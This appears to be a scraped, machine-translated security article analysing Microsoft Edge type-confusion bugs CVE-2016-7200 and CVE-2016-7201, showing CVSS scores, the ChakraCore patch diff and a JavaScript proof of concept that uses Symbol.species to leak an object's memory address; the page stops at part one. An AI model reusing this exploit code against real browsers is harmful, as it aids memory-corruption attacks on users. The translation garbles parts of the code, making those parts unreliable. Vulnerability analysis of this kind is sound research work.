Lucene search

佚名MYHACK58:62201786300

HistoryMay 21, 2017 - 12:00 a.m.

Windows 10 x64 Edge CVE-2016-7200 & CVE-2016-7201 vulnerability analysis and exploit-vulnerability warning-the black bar safety net

2017-05-2100:00:00

佚名

www.myhack58.com

144

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

7.6 High

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:H/Au:N/C:C/I:C/A:C

0.971 High

EPSS

Percentile

99.7%

JSON

The ## 1. Analysis of the environment

Operating system: Windows 10 x64 Professional Edition 10.0.14393 browser: Microsoft Edge x64 38.14393.0

2. CVE-2016-7200 analysis

This is happening in the JavascriptArray::FilterHelper, due to the type of Confusion caused by the vulnerability, look at the commit

template <typename T> Var JavascriptArray::FilterHelper(JavascriptArray* pArr, RecyclableObject* obj, T length, Arguments& args, ScriptContext* scriptContext)
{ if (args. Info. Count < 2 || ! JavascriptConversion::IsCallable(args[1]))
{
JavascriptError::ThrowTypeError(scriptContext, JSERR_FunctionArgument_NeedFunction, _u(“Array. prototype. filter”));
}

RecyclableObject* callBackFn = RecyclableObject::FromVar(args[1]); Var method performs a stable = nullptr; if (args. Info. Count > 2)
{
method performs a stable = args[2];
} else {
method performs a stable = scriptContext->GetLibrary()->GetUndefined();
} // If the source object is an Array exotic object we should try to load the constructor property and use it to construct the return object. - RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext);

bool isBuiltinArrayCtor = true;
RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext, nullptr, nullptr, &isBuiltinArrayCtor);
JavascriptArray* newArr = nullptr; if (newObj == nullptr)
{
newArr = scriptContext->GetLibrary()->CreateArray(0);
newArr->EnsureHead<Var>();
newObj = newArr;
} else { // If the new object we created is an array, remember that as it will save us time setting properties in the object below if (JavascriptArray::Is(newObj))
{
+#if ENABLE_COPYONACCESS_ARRAY + JavascriptLibrary::CheckAndConvertCopyOnAccessNativeintarray<Var>(newObj);
+#endif newArr = JavascriptArray::FromVar(newObj);
}
} Var element = nullptr; Var selected = nullptr; if (pArr)
{
Assert(length <= MaxArrayLength);
uint32 i = 0; for (uint32 k = 0; k < length; k++)
{ if (! pArr->DirectGetItemAtFull(k, &element))
{ continue;
}

selected = callBackFn->GetEntryPoint()(callBackFn, CallInfo(CallFlags_Value, 4), The method performs a stable,
element,
JavascriptNumber::ToVar(k, scriptContext),
pArr); if (JavascriptConversion::ToBoolean(selected, scriptContext))
{ // Try to fast path if the return object is an array - if (newArr)

if (newArr && isBuiltinArrayCtor)
{
newArr->DirectSetItemAt(i, element);
}

Look under the POC

var x = (new Array(56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)). the slice(); var [hi, lo] = PutDataAndGetAddr(x); function PutDataAndGetAddr(t) { var d = new Array(1,2,3); class dummy { constructor() { return d;
}
} class MyArray extends Array { static get Symbol. species { return dummy;
}
} var a = new Array({}, t, “theori”, 7, 7, 7, 7, 7); function test(i) { return true;
}

a.__ proto__ = MyArray. prototype; var o = a. filter(test); var h = []; for (item in o) { var n = new Number(o[item]); if (n < 0) {
n = n + 0x100000000;
}
h. push(n);
} return [h[3], h[2]];
}

[1] [2] [3] [4] [5] [6] next